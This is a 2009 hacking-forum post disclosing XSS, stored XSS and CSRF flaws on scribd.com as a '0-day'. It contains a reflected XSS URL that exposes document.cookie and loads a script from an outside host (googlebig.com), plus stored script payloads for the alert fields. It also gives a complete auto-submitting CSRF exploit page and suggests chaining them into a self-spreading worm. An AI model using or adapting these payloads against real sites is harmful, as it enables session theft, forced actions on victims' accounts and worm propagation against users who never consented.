Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Bug reports, feature enhancements or other complaints with the site, with us or just tell us what a miserable existance you have. No death threats or poetry please. Just kidding, no poetry please. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
MULTIPLE VULNERABILITY(xss,csrf,worm) on www.scribd.com
Posted by: XaDoS
Date: September 18, 2009 03:57PM

The site http://www.srcibd.com, a network community(che Obama ha usato per la sua campagna elettorale) it's a big community that fight with amazon.com for the 1° most visited site at world. (now scribd have 55 milion of visit evry month)

It's vulnerable to xss, permanent xss, js injection and CSRF
(all DISCOVERED BY ME)

#### XSS:
http://www.scribd.com/my_docs?query=//%3Cfont%20color=%22red%22%3EXADOS%20WAS%20HERE%3C/font%3E%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E%3Cmarquee%3E%3Ch1%3EXSS%20By%20XaDoS%3Ch1%3E%3C/marquee%3E%3Cscript%20src=%22http://www.googlebig.com/x.js%22%3E%3C/script%3E

### Permanent XSS:

(after login)
at page http://www.scribd.com/alerts a user can write a new alert, but with malicious js code like:
Name of alert: "><script>alert(1)</script>
text of alert: "><script>alert(2)</script>

and so post request are like..
Code:
<input id="alert_name" name="alert[name]" size="30" style="width: 500px;" value="&quot;&gt;&lt;script&gt;alert(1)&lt;/script&gt;" type="text">

<textarea cols="40" id="alert_alert_text" name="alert[alert_text]" rows="20" style="width: 500px; height: 80px;">"&gt;&lt;script&gt;alert(2)&lt;/script&gt;</textarea>


and there are no token or captcha, so an attaker can write a csrf code like this( working!):
Code:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>scribd csrf exploit</title>
<meta http-equiv="Content-Type" content="text/HTML; charset=UTF-8" />
</head>
<body>
<form name="xados" action="http://www.scribd.com/alerts" class="new_alert" id="new_alert" method="post">
    <input id="alert_word_user_id" name="alert[word_user_id]" type="hidden" value="[ID-VICTIM]" />
        <input id="alert_name" name="alert[name]" size="30" style="width: 500px;" type="text" value="[TITLE]" />
    <textarea cols="40" id="alert_alert_text" name="alert[alert_text]" rows="20" style="width: 500px; height: 80px;">[MESSAGE]</textarea>
        <input checked="checked" id="alert_matchmode_2" name="alert[matchmode]" type="radio" value="2" />
    <input id="alert_matchmode_1" name="alert[matchmode]" type="radio" value="1" />
    <input name="commit" type="submit" value="submit" />
</form>
<script>document.xados.submit()</script>
</body>
</html>

and trought this csrf can create an xss worm that self
reply trought alerts xss permanet vuln.

have fun.
0-day by XaDoS

Options: ReplyQuote


Sorry, only registered users may post in this forum.